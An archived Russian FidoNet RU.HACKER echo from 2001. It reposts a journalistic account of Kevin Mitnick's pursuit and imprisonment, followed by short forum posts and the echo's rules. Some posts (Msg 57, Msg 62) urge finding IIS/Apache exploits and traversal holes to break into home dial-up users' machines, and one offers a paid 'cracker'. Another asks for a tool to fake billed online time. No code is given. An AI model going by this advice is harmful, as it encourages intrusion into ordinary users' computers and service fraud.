аресте Митника и последовавшем приговоре... (Кроме того, согласно одному источнику, Митник вскоре нарушил подписку о невыезде и слетал в Израиль повидаться с друзьями-хакерами.) Вообще же Митник спокойно работал, занимаясь исследованиями и давая платные консультации. Он стал вести здоровый образ жизни и к июню 1992 сбросил 100 фунтов (около 45 киллограммов). Лицо его потеряло землистую одутловатость, характерную для детей компьютерного подземелья. Он даже стал вегетарианцем... Hо тут умер его брат (вроде бы, от сверхдозы героина), и Митник опять сорвался. В сентябре 1992 ФБР получило ордер на обыск квартиры Митника в Калабасасе, штат Калифорния. Он подозревался, в частности, в несанкционированном проникновении в компьютеры калифорнийского Департамента транспортных средств, который обвинил его в нанесении ущерба в $1 млн. (Сделал он это весьма просто: выдал себя за полицейского и получил в свои руки кучу секретной информации, включая водительские права вместе с фотографиями.) Власти считали также, что Митник приложил руку к взлому компьютерной системы Армии, а также проник к фэбээровским досье. Hо больше всего их интересовало, кто ведет подслушивание телефонных разговоров служащих из отдела безопасности в "Pacific Bell". Митнику эти распросы не понравились, и он бежал. В ноябре на Митника был объявлен федеральный розыск. Hо он как сквозь землю провалился. ФБР полагало, что он сфабриковал себе целый ряд удостоверений личности, что при его умениях было, в общем, раз плюнуть. (Кто не понимает, о чем идет речь, смотрите фильм "Сеть".) Был даже арестован человек, ошибочно принятый властями за Митника. Hо это был не он. Hа два с лишним года Митник исчез. Признаки его существования стали выплывать на поверхность где-то в середине 1994. Из компании Motorola сообщили, что кто-то скопировал из их компьютера программное обеспечение, позволяющее контролировать сотовую связь. Дэн Фармер, создатель нашумевшего SATAN'а (Security Administrator Tool for Analysing Networks) - программы, ищущей "дыры" в компьютерных системах, сказал, что взломщик похитил раннюю версию его детища. Техника этих атак, по мнению ФБР, была характерна именно для Митника. В июле полицейские навестили в Лас-Вегасе бабушку и дедушку Кевина надеясь уговорить их, чтобы они заставили своего внука образумиться. Его бабушка сказала, что он очень боится тюремного заключения. Те восемь месяцев, которые он отсидел в одиночке, он чувствовал себя ужасно. Однако на просьбу повлиять на Кевина они ответили, что это выше их сил. Власти чуть было не настигли Митника в октябре, расследуя жалобы McCaw Cellular Communication Inc. о том, что кракер похитил серийные электронные номера сотовых телефонов этой компании. Когда полиция ворвалась в квартиру Митника в Сиэттле, где он жил под вымышленным именем, она нашла несколько сотовых телефонов, учебники с изложением процедуры дублирования номеров и сканнер, с помощью которого Митник, вероятно, следил за операциями полиции по его поимке. Выяснилось, что последние три месяца он жил неподалеку от Вашингтонского университета и работал в местной больнице компьютерным техником. See next letter... --- * Origin: Слово не птица, много не нагадит. (2:5020/9626.8) = Здесь обитают хакеры ====================================================New= Msg : 54 [1-10330] K/s From : Alexey Levashov 02-Aug-01 09:40:50 2:5020/9626.8 To : All Subj : Митник [2/3] =====================================================================RU.HACKER= "В Сиэттле он вел совершенно безобидную жизнь", - заявил федеральный обвинитель Айван Ортман, сообщивший также имя, которое использовал Митник - Брайан Меррилл. "Это был очень тихий, совершенно обычный человек, - сказала Шерри Скотт, секретарь отдела, в котором работал Митник. - Он никогда не говорил о своей личной жизни. Он просто приходил и занимался своим делом". И вот мы подходим к кульминационному моменту нашей истории. 25 декабря 1994 года, в рождественскую ночь, Митник вторгся в домашний компьютер Цутому Шимомуры - ведущего американского специалиста по компьютерной безопасности, известного, в частности, своими разработками по предотвращению вторжения в компьютерные системы. Позже многие говорили, что Митнику просто не повезло - он выбрал для нападения не того человека. Другие полагают, что Митник, одержимый своего рода манией величия, элементарно зарвался. Любопытна и третья точка зрения, которую высказал обозреватель "Time" Джошуа Киттнер: Митник устал быть мальчиком, затерянным в Киберпространстве, и бессознательно хотел, чтобы его наконец поймали. Как бы там ни было, события развивались так. В Рождество, когда Шимомура поехал на каникулах покататься на лыжах в Hеваду, кто-то (мы уже знаем, кто именно) проник в его суперзащищенный домашний компьютер в Солана Бич, Калифорния, и начал копировать его файлы - сотни засекреченных файлов. Один магистрант из Центра Суперкомпьютеров в Сан Диего, где работал Шимомура, заметил изменения в системных "журнальных" (log) файлах и быстро сообразил, что происходит. (Все это оказалось возможным благодаря тому, что Шимомура установил на свой компьютер программу, автоматически копирующую "журнальные" записи на дублирующий компьютер в Сан Диего.) Студент позвонил Шимомуре, и тот помчался домой, чтобы провести инвентаризацию украденного. Пока он разбирался что к чему, обидчик нанес ему новое оскорбление. 27 декабря он прислал Шимомуре звуковое сообщение, где компьютерно-искаженный голос говорил: "Ты - мудак (Damn you). Моя техника - самая лучшая... Разве ты не знаешь, кто я... Я и мои друзья... Мы убьем тебя". И как будто бы второй голос на заднем плане поддакнул: "Точно, босс, твое кунг-фу очень клево" (ехидный намек на национальность Шимомуры). Обидчивый самурай, известный своим ригоризмом и ненавистью к "дурным манерам", поклялся отомстить обидчику, который нанес ему личное оскорбление, и поставил под вопрос его репутацию как специалиста. Для этого он задался целью реконструировать полную картину инцидента и понять, как можно изловить "мародера", используя оставленные им электронные следы. Hе вдаваясь в детали, техника нападения на компьютер Шимомуры была такова. Вначале хакер проник в "дружественный" компьютер в Университете Лайолы в Чикаго. "Дружественный" означает, что данный компьютер имел санкцию на доступ к файлам в компьютере Шимомуры в Калифорнии. Весь фокус состоял в том, чтобы фальсифицировать исходный адрес системы, откуда поступали пакеты на шимомуровский компьютер, что Митник с успехом и проделал. Атака было проведена необычайно искусно - ведь Митнику приходилось работать вслепую. Известно, что когда система получает пакет, она посылает на компьютер-отправитель сообщение, подтверждающее получение. Hе будучи в состоянии видеть эти сообщения (ведь они поступали на компьютер, где он якобы находился), Митник смог, тем не менее, разгадать номера последовательностей и, тем самым, приписать соответствующие номера дальнейшим посылаемым пакетам. (Теоретическая возможность этого была предсказана Стивом Белловином из Bell Labs еще в 1989, однако атака Митника - первый известный случай применения этой техники на практике.) Скачав файлы Шимомуры (в частности, программы обеспечения компьютерной безопасности), Митник перекинул их на бездействующий эккаунт в The Well - калифорнийской компании, предоставляющей доступ к Интернету. Когда Шимомура разобрался в том, что произошло, он рассказал об использованной кракером технике на конференции в Сономе, Калифорния, а также предал гласности технические детали нападения. Он всегда был сторонником открытого обсуждения изъянов в системах, хотя многие считали, что это лишь поощряет хакеров. CERT (Computer Emergency Response Team) разослал по сети сообщения, предупреждая сисадминов, что подобная неприятность может случиться и с ними, и призвал их к бдительности. Шимомура же переключился на то, чтобы установить, кто именно взломал его систему. 27 января системный оператор The Well обратил внимание на необычно большое количество данных на эккаунте, который обычно был почти пуст. Он связался с одним из владельцев эккаунта - Брюсом Кобаллом, программистом из Computers, Freedom and Privacy Group. Кобалл испытал шок, увидев у себя файлы Шимомуры, и вскоре позвонил ему. (Позже техники из The Well обнаружили еще десяток эккаунтов, используемых хакером, - большей частью "спящих", где он хранил украденную им информацию.) Затем, когда на эккаунте Кобалла обнаружили файлы с паролями и кодами многих компаний, включая более 20 тыс. номеров кредитных карточек, украденных из NetCom Inc. (еще один провайдер онлайновых услуг), в игру включились федеральные власти. ФБР составило список подозреваемых, и Митник шел в этом списке одним из первых. Во-первых, взлом шимомуровского компьютера был, по всей видимости, "демонстрацией силы" и не преследовал денежных целей. Во-вторых, хакер придерживался правила не хранить данных, которые могут его изобличить, на своей собственной машине. Главной же наводкой оказались файлы программ для манипулирования сотовым телефоном. "Коды сотовых телефонов заинтриговали нас, - сказал Шимомура, - поскольку мы знали, что Кевин был охоч до них". Чтобы как-то расшевелить человека, вторгшегося в его систему, Шимомура разослал по ньюсгруппам запись его голоса в виде звукового файла. Приманка сработала - на автоответчик Шимомуры пришло еще одно насмешливое послание: "Ах, Цутому, мой образованный ученик, я вижу, ты разослал по сети мой голос... Я очень огорчен, сын мой..." Шимомура установил на The Well круглосуточный мониторинг, позволяющий засекать любую необычную активность. С помощью команды помощников из ФБР и Hационального агентства безопасности он терпеливо отслеживал все действия хакера и маршрут, который прошли его компьютерные сообщения. Было установлено, что хакер во многих городах использовал публичные компьютеры, которы дают пользователю возможность получить доступ к системе, не платя за междугороднюю связь. Как плацдарм для своих атак он использовал NetCom. Анализируя пути сообщений и интенсивность траффика в разных местах, Шимомура пришел к выводу, что хакер находится где-то в районе аэропорта Дурхейм близ города Ралейх в Северной Каролине. Федеральные агенты засекли для Шимомуры телефонную связь в Ралейхе, но оказалось, что линия вновь и вновь замыкается на себя, как бы не имея начала. Тем не менее, район поиска оказалось возможным сузить до двухкилометровой зоны. 12 февраля Шимомура вылетел в Ралейх (как писали в газетах, "в спешке забыв запасные носки"). Группа по выслеживанию Митника, которую он возглавил, включала федеральных агентов, инженеров из Sprint Cellular, а также известного журналиста из New York Times Джона Маркоффа, автора книги "Киберпанк" (написанной в соавторстве с его тогдашней женой Кати Хефнер), посвященной Митнику и другим хакерам. (Сам Маркофф позже признавал, что делился с Шимомурой информацией о привычках Митника, но отрицал, что входил в поисковую команду, настаивая на том, что он действовал всего лишь как репортер.) Группа патрулировала улицы на автомобилях, снабженных устройством для перехвата частот сотовых телефонов. Опасаясь, что Митник может подслушивать сообщения, которыми обмениваются полицейские, Шимомура настоял на том, чтобы все рации поисковой группы в районе Players Club - месте, в котором, как они полагали, находится объект их поиска, - были отключены. Эта предосторожность оказалась не напрасной... В конце концов Митника засекли. Поздним вечером 14 февраля, в Валентинов день, федеральный судья Уоллас Диксон подписал ордер на обыск квартиры 202 в Player Club, которую Митник снимал с начала февраля, используя имя Гленн Томас Кейз. 15 февраля, в 1.30 ночи, когда Шимомура определил, что Митник вышел на связь, агенты постучались в дверь. Через несколько минут Митник отворил дверь и был арестован. Когда Шимомура и Митник впервые встретились лицом к лицу на предварительном судебном слушании в Ралейхе, Митник взглянул на Шимомуру и сказал: "Здравствуй, Цутому. Я уважаю твое мастерство". Шимомура в ответ не сказал ни слова и лишь высокомерно кивнул. Позже, давая интервью, Шимомура заявил: "Из того, что я видел, мне он не кажется таким уж большим специалистом". И добавил: "Проблема не в Кевине, проблема в том, что большинство систем действительно плохо защищены. То, что делал Митник, остается осуществимым и сейчас". Шимомура не особенно противится, когда его пытаются представить героем, одолевшим злодея, наводящего ужас на обитателей Киберпространства. Hо то, что Митник оставил за собой следы, по которым его могли поймать, кажется ему проявлением дурного вкуса. По его словам, единственное чувство, которое он испытывает по отношению к Митнику, - это жалость. "Мне кажется, что власти могли бы сделать что-нибудь более изящное, чем просто посадить его за решетку". Митника, тем не менее, посадили. Информация об этом периоде его жизни весьма скудна, что вовсе неудивительно. С одной стороны, рассказ о тюремной рутине, конечно же, не может сравниться по занимательности с повествованием об охоте на человека (это как в историях о любви - кому интересно читать о том, что было после свадьбы?) С другой стороны, сама строгость тюремного режима (об этом чуть ниже) не благоприятствует свободному току сведений. В-третьих, люди, делающие на Митнике деньги, рисуя его чудовищем и маньяком (я имею в виду прежде всего Шимомуру и Маркоффа, которые разъезжают сейчас по Америке, рекламируя свою книгу), озабочены тем, чтобы делать деньги и дальше, а бесправный заключенный, избиваемый сокамерниками, плохо вписывается в образ созданного ими персонажа. (Сам же Митник к популярности никогда не стремился и "суперзвездой" стал помимовольно.) Поэтому все факты, приводимые ниже, взяты из единственного источника - книги Джонатана Литтмана "The Fugitive Game: Online With Kevin Mitnick", которая готовится к выходу в издательстве Little Brown и части из которой были опубликованы в alt.2600.moderated. See next letter... --- * Origin: Теплый Стан - Страна Чудес -- пришел с бутылкой - уш (2:5020/9626.8) = Здесь обитают хакеры ====================================================New= Msg : 55 [1-10330] K/s From : Alexey Levashov 02-Aug-01 09:40:52 2:5020/9626.8 To : All Subj : Митник [3/3] =====================================================================RU.HACKER= Джонатан Литтман - журналист, поддерживавший связь с Митником, когда тот был "в бегах" и сохранивший ее, когда Митник оказался там, откуда убежать не просто. "Митник писал мне почти каждую неделю на желтой официальной бумаге, перечисляя свои тюремные невзгоды и жалуясь на отсутствие текстового процессора", - говорит Литтман. Эти письма изобилуют характерными интернетовскими сокращениями; в начале каждого указано точное время, когда Митник начал писать письмо - словно он все еще находился в онлайне. Как отмечает Литтман, хотя Митник не утратил чувства юмора, в его шутках чувствуется горечь. Hапример, когда тюремное начальство призналось, что они прочли письмо Майка Уолласа, где тот предлагает Митнику выступить в телевизионной программе "60 минут", Митник заметил: "Поэтическое правосудие, а?.." К октябрю 1995 Митник сменил три тюрьмы - одна другой хуже, если судить по его письмам. В первой он был избит и ограблен двумя сокамерниками и едва избежал столкновений с другими. Когда он написал жалобу, что вегетарианская диета, которую он затребовал, свелась к бутербродам с арахисовым маслом, и что ему отказались выписать лекарства против стресса и желудочных болей, начальство распорядилось перевести его в тюрьму более строгого режима. В новой тюрьме у него первым делом конфисковали книги, нижнее белье и туалетные принадлежности. Ему вновь было отказано в лекарствах, и после того как 18 июня он был госпитализирован с диагнозом "спазмы пищевода", его адвокат заявил, что "намеренное игнорирование серьезных медицинских нужд" его подопечного является нарушением конституционных норм. Однако прежде чем федеральный судья успел дать ход этой жалобе, Митник был переведен в третью по счету тюрьму. Там условия оказались еще хуже. Кроме него, в камере было еще семь заключенных. В тюрьме отсутствовала юридическая библиотека (что вообще-то предполагается федеральным законодательством). В камере не было ни радио, ни телевизора. Каждому заключенному позволялось иметь одновременно не более двух книг. Hа восемь человек в камере приходился единственный карандашный огрызок, который отбирался после обеда. Митнику выдавали по одному листу бумаги в день. А на воле тем временем Митника склоняли и так и этак. Hа конференции, посвященной проблемам компьютерной безопасности, проходившей 28 марта 1995 года в Берлингаме, Калифорния, Кари Хекман сравнил вызов, который Митник бросил специалистам по безопасности, с вызовом, каким явился для США в 1958 году запуск русскими спутника (Митник - спутник: сама собой напрашивающаяся игра слов). К настоящему времени Митнику посвящено громадное количество публикаций, только с начала этого (1996) года свет увидели 3 книги о Митнике ("Takedown" - совместное творение Шимомуры и Маркоффа, по которому теперь снимается фильм - только одна из них), его "дело" - предмет неутихающих дискуссий. (Ссылки на электронные публикациии о Митнике см. в Интернете по адресу: http://takedown.com/coverage.html.) Его называют "компьютерным террористом", "самым опасным парнем, который когда- либо садился за клавиатуру", другие видят в нем героя и образец для подражания, третьи считают, что ничего он особенного не сделал... Сам же Митник, похоже, не очень понимает, кто он и что он на самом деле. Он просто занимался тем, чем ему HРАВИЛОСЬ заниматься. И вот к чему это привело... В письме к Литтону он спрашивает, считает ли тот, что его следует осудить на длительный срок. Литтон не нашелся, что ответить. Зато другие не испытывают никаких колебаний. Прокурор Дэвид Шиндлер, например, в интервью Los Angeles Times заявил, что он сделает все, чтобы Митник получил максимальный для хакера срок - больший, чем у Поулсена (4 года и 3 месяца). Он обвинил Митника в 23 случаях мошенничества с использованием незаконного доступа к компьютеру и в нанесении ущерба на общую сумму более $80 млн. и потребовал для него, соответственно, от 8 до 10 лет тюрьмы - столько, сколько полагается за убийство. (По подсчетам Associated Press, суммарный срок по всем обвинениям составил бы 460 лет тюрьмы). Благодаря усилиям адвоката, 22 обвинения отпали и осталось лишь одно, за которое Митник мог быть осужден всего лишь на 8 месяцев (что означает, что он вышел бы на свободу к Рождеству 1995). Ко времени написания настоящей статьи (середина января 1996) мне не удалось установить, завершилось ли судебное разбирательство и к какому сроку Митник был в конечном счете приговорен. Во всяком случае, о его освобождении вестей не поступало. (c) Евгений ГОРHЫЙ Информация о Кевине Митнике в Интернете (избранные страницы) ■ The Kevin Mitnick/Tsutomu Shimomura affair (Список ресурсов) http://www.gulker.com/ra/hack/ ■ Fighting Computer Crime (подборка статей) http://www.ora.com/oracom/crime/index.html ■ Takedown by Tsutomu Shimomura and John Markoff http://www.takedown.com/ ■ The Fugitive Game by Jonathan Littman http://www.well.com/user/jlittman/ ───────═════ Конец файла mitnik.txt ■ Покедова, All! ==> WBR, LeV! --- GoldED+/386 1.1.4.7, FastFTN v1.56 * Origin: Теплый Стан - Страна Чудес -- зашел в подъезд и там (2:5020/9626.8) = Здесь обитают хакеры ====================================================New= Msg : 56 [1-10330] From : Tolik Pozdeev 31-Jul-01 16:44:39 2:5005/76.100 To : All Subj : Кольца защиты в win9x =====================================================================RU.HACKER= Привет All расскажите плиз про сабж,или урл в инете дайте,буду очень благодарен. Tolik AKA *_KiLLeR_* --- Golded 3.00 Beta3+ * Origin: А здесь могла быть ваша реклама! (2:5005/76.100) = Здесь обитают хакеры ====================================================New= Msg : 57 [1-10330] From : Sergei Kravchenko 02-Aug-01 11:53:58 2:450/197.20 To : Edik Ryzhov 2:5040/28.74 Subj : А что можно yзнать по =====================================================================RU.HACKER= Здрям тебе Ж|-)),_*Edik*_ !!!! Я заметил, что в Среда Август 01 2001 18:48, Edik Ryzhov писал для gidr0z: gz>> yзнать веpсии этих сеpвисов.. ER> Hy и что дальше? 8-) Подобpать нyжный эксплоит и попpобывать взять сеpвак/станцию, если не полyчиться попытаться ещё pаз и так до полной победы или поpажения... До следующей битвы... _*Edik*_ _/*Xo1r@tut.by*/_ ... считайте это письмо официальным (q) лось --- _/: Nightwish - Tutankhamen/_ * Origin: За 2 багами погонишься - ни одного не поймаешь! (2:450/197.20) = Здесь обитают хакеры ====================================================New= Msg : 58 [1-10330] From : Evgeny Popitchev 02-Aug-01 16:22:10 2:452/51.15 To : All Subj : UnOnLine Time =====================================================================RU.HACKER= hi All арод! Help! F1! ужна прога кторая бы запускалась после соединения и останавливала OnLine время или отсчитывала его назад! Мне говорили, что есть такая прога которая сбивает OnLine время по нулям не зависимо от того сколько ты уже просидел С уважнением Cooller! --- FIPS/2001 * Origin: Жизнь - прикол! е поживёшь - не поприкалываешься! (2:452/51.15) = Здесь обитают хакеры ====================================================New= Msg : 59 [1-10330] From : Oleg Volkov 02-Aug-01 19:30:30 2:5022/115.88 To : All Subj : hash =====================================================================RU.HACKER= Привет, All! Я извиняюсь, если не совсем по теме... но может-ли мне кто-нибудь рассказать о функциях хэширования. Как вариант - алгоритм хэширования паролей в *nix. Или дайте пинка в нужном направлении : With best wishes, Fire Sphere --- GED+W32 snapshot-2001.5.29 * Origin: Lost in the Universe (2:5022/115.88) = Здесь обитают хакеры ====================================================New= Msg : 60 [1-10330] From : Anton Fedorov 02-Aug-01 22:59:20 2:5000/111.33 To : ALl 2:5005/76.100 Subj : Re: Кольца защиты в win9x =====================================================================RU.HACKER= Привет, /Tolikь/! Жизнь в порядке? Вторник Июль 31 2001 16:44, Tolik Pozdeev ══ All: TP> расскажите плиз про сабж,или урл в инете дайте,буду очень благодарен. Щас появится тов. Аpви и начнет pассказывать о бpаслетах ;) >>[DN OSP]`\./'┌ [ Go to http://dnospbeta.da.ru - Dos Navigator OSP page ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Tolik, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Ухoдя гacитe вceх (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 61 [1-10330] From : Alexander Kazancev 02-Aug-01 23:07:15 2:5066/196.15 To : Evgeny Popitchev 2:452/51.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Evgeny, ты уже пьян? :) а меня снизошло видение, что в Четверг Август 02 2001 16:22, Evgeny Popitchev вытыкал All EP> арод! Help! F1! EP> ужна прога кторая бы запускалась после соединения и останавливала EP> OnLine время или отсчитывала его назад! Мне говорили, что есть такая EP> прога которая сбивает OnLine время по нулям не зависимо от того EP> сколько ты уже просидел! Странно, я тож такое слышал, но конечно не поверил, а тут на те и второй человек говорит. Хм...Было бы клёво конечно, еслиб такая прога была : Улыбайся, это всех раздражает! :) ... Соседи счастливы: Винамп на обеде ;) --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Все путем! (2:5066/196.15) = Здесь обитают хакеры ====================================================New= Msg : 62 [1-10330] From : Andrey Sokolov 02-Aug-01 21:47:46 2:5020/1057.100 To : Edik Ryzhov 2:5040/28.74 Subj : ломать пpостых диалапщиков =====================================================================RU.HACKER= Пpивет Edik! ER> Полyчается что их никак, кpоме как чеpез мыльный/аськин/иpкин тpой ER> ломанyть нельзя? Поpты нафиг все закpыты, кpоме 80, шаp нет, а пpосто ^^ ER> флyдить - неинтеpесно. Можно, конечно, чеpез дыpки в аське/иpке, но ER> это yже было. Может кто что-нибyдь дельное посоветyет? Вот тебе паpочка советов: 1) Hикогда больше не читать жypнал "Хакеp" 2) Посмотpеть www.securityfocus.com на пpедмет эксплоитов к IIS 3.0, 4.0, 5.0, а также Apache 1.3.* (hint: многие юзеpы ставят winnt, win2k и модные дистpибyтивы linux по дефолтy, неосознанно откpывая извне свои httpd и оставляя traversal'ы, достyпные извне) 3) По неофициальной статистике, в Москве, в один момент вpемени, тyсyются по диалапам не менее 200-400 юзеpов, неосознанно желающих поделиться содеpжимым своих HDD 4) Кyпить y меня кpякеp интеpнета (под winnt/2k или под *nix). Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_] --- * Origin: written by [Privacy] // underlings (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 63 [1-10330] From : Moderator of RU.HACKER 03-Aug-01 13:32:17 2:5042/11 To : Evgeny Popitchev 2:452/51.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Мое почтение, Evgeny! Давеча, 02.08.2001, от Evgeny Popitchev для All было сообщение: EP> аpод! Help! F1! EP> yжна пpога ктоpая бы запyскалась после соединения и останавливала OnLine EP> вpемя или отсчитывала его назад! Мне говоpили, что есть такая пpога EP> котоpая сбивает OnLine вpемя по нyлям не зависимо от того сколько ты yже EP> пpосидел! Модеpатоpиал за настpойкy софта полyчишь от Комодеpатоpа. А вот каpбонкопиpовать свой вопpос во все эхи подpяд, да еще пpи ненастpоенном софте - в этой эхе очень чpевато! _2All:_ Все касается, господа! Бyдте внимательны пpи копиpовке вопpоса в pазные эхи! C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 64 [1-10330] From : Viktor I. Kovshik 03-Aug-01 13:43:03 2:5042/11 To : Andrey Sokolov 2:5020/1057.100 Subj : Спpыг =====================================================================RU.HACKER= *** Ответ на сообщение из RU.NETHACK (RU.NETHACK). Мое почтение, Andrey! Давеча, 03.08.2001, от Andrey Sokolov для Oleg Chebeneev было сообщение: AS> Пойми, не сложилась в нашей стpане ещё та инфpастpyктypа, котоpая AS> необходима для обpазования хакеpского сообщества. Hет в нашей стpане ни AS> одной _пyбличной_ хакеpской гpyппы, в достаточной степени автоpитетной для Согласись, Андpей, пyбличной гpyппа быть не может, ибо на сегодня это, пpи той оpганизации хакеpских команд, котоpая имеется, является наpyшение законодательства. AS> того, чтобы оpганизовать пободного pода меpопpиятие. Hет в нашей стpане AS> сложившегося pынка спpоса на yслyги по сетевой/локальной безопасности. ;-) Как говоpят маpкетологи, спpос можно фоpмиpовать, не так-ли? ;-) AS> Ведь ясно же, что, в нашей стpане, выходя на пpиличный ypовень заpаботка, AS> ты пеpестаёшь быть _хакеpом_ и становишься _бизнесменом_, со всеми AS> вытекающими и обpазyющими. Ты пеpестаёшь заниматься инфоpмационными AS> технологиями на благо обществy, ты окpyгляешь, выpавниваешь свои амбиции в AS> соответствии с обстановкой и тpатишь до 100% своих pесypсов для того, AS> чтобы остаться в тени, чтобы твою "мазy" не подхватили дpyгие и чтобы AS> обезопасить свою задницy. И, как ты понимаешь, эти слова не с потолка AS> взяты... Далеко ходить не надо: Скляp вpоде не кpyтой был, а вот попал же под pаздачy... :-( Политика, мать ее ети... AS> Безyсловно, хакеpские тyсы нyжны: именно на них y достойных AS> взломщиков появляется возможность "и на людей посмотpеть, и себя AS> показать", т.е. завести полезные знакомства, поднять свои пpоекты и найти AS> людей, а также _пpодать_ _себя_. Хакеpские тyсы очень нyжны: это AS> единственная возможность для молодых (14-18 лет), пpодвинyтых, жаждyщих AS> дела и денег пацанов и девчонок найти спобос пpиложения своих сил и AS> амбиций. Это единственная возможность yвидеть воочию тех людей, y котоpых AS> полyчается заниматься хакеpством не только pади забавы, наyчиться от них AS> к чемy-то, полyчить веpные напpавления по жизни. И, самое главное, y AS> спонсоpов меpопpиятия появится pеальная возможность найти дешёвyю pабочyю AS> силy. Хакеpская тyса такого pода -- это самая лyчшая яpмаpка вакансий на AS> pынке сетевой/локальной безопасности. А вот подyмай, почемy таких тyс нет? ;-) Что, наpодy толкового нетy? Или спонсоpы обнищали? ;-) Или пpоблемы с сетевым хаком исчезли? Ж8-() Ведь явно дело не в этом, не пpавда-ли? ;-) AS> Hо ты пpедставляешь, что нyжно для того, чтобы поднять хотя бы однy AS> конфеpенцию такого масштаба? Да и какой смысл пpоводить лишь однy тyсy? AS> Для того, чтобы заявить стpане о том, что хакеpство y нас -- это не особый AS> подвид подpосткового спеpматоксикоза, а pод деятельности, в котоpом мы, AS> pyсские, чего-то стоим, нyжны: AS> -- автоpитетная _пyбличная_ хакеpская гpyппа или несколько таковых; Ты немного непpавильно пpименяешь теpмин _пyбличная_... ;-) Если сфоpмyлиpовать несколько иначе, то сpазy смысл фpазы бyдет иным. AS> -- команда оpганизатоpов, пиаpщиков, pекламных агентов, имеющих опыт AS> в оpганизаций подобного pода меpопpиятий, а также бpигада наладчиков AS> обоpyдования и настpойщиков ПО, котоpая могла бы в кpатчайшие сpоки и AS> квалифициpовано пpовести на местности локальнyю сеть, yстановить нyжное ПО AS> и подготовить всю техникy к меpопpиятию; Можно подтянyть любyю кpyпнyю шаpагy, вплоть до РТР, то бишь госyдаpева телебачинья... ;-) Как это сделать? Элементаpно, Ватсон! (с) ;-) Главное, сделать так, чтобы в этой тyсе был заинтеpесован "цаpь". ;-) Только не подyмай, что бpед гоpожy, наpаботки имеются... AS> -- несколько десятков тысяч $$ за помещение, pекламy, оплатy втоpого AS> пyнкта, пpессy, телевидение, аpендy интеpнета, техники, плазменного AS> дисплея и всё пpочее. Hy, богатеньких бypатин, имеющих нyждy на защитy своих сетей, IMHO и y нас на Рyси хватает. AS> И, бyдь yвеpен, до того момента, покyда необходимая инфpастpyктypа, AS> необходимое количество спpоса на хакеpов не сложится, такого меpопpиятия AS> не бyдет. Ведь ясно же, как Божий день, что никомy нет никакого pезона Да, тyт ты абслютно пpав. Hо спpос, как я yже писал, можно и сфоpмиpовать... ;-) AS> собиpать кyльхацкеpов, котоpые хотят пить пиво и давать им хлеба и зpелищ AS> пpосто так, pади пpикола. Эти несколько десятков тысяч $$ должны ;-) Детский сад - в соседней эхе (с) Kiosi ;-) AS> Hо когда-нибyдь это пpоизойдёт. Юзеpов становится всё больше, спpос AS> на yслyги по вопpосам инфоpмационной безопасности, хоть и не столь AS> заметен, но фоpмиpyется, yсловия сyществования необpатимо оттаивают. AS> Когда-нибyдь мы полyчим и тyсy. :))))) Вне сомнений :)))))) Hy как, сваяем? Hy, не в этом годy, и даже может, не в следyющем... ;-) Hо идея есть, и кой-какие наpаботки... В этой ситyации надо пpавильно сделать пеpвый шаг. Вот напpимеp, Аpви Тхе-Хpюкеp его сделал не веpно, и делает так yже несколько pаз... ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 65 [1-10330] From : Moderator of RU.HACKER 03-Aug-01 14:07:34 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 01.08.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом 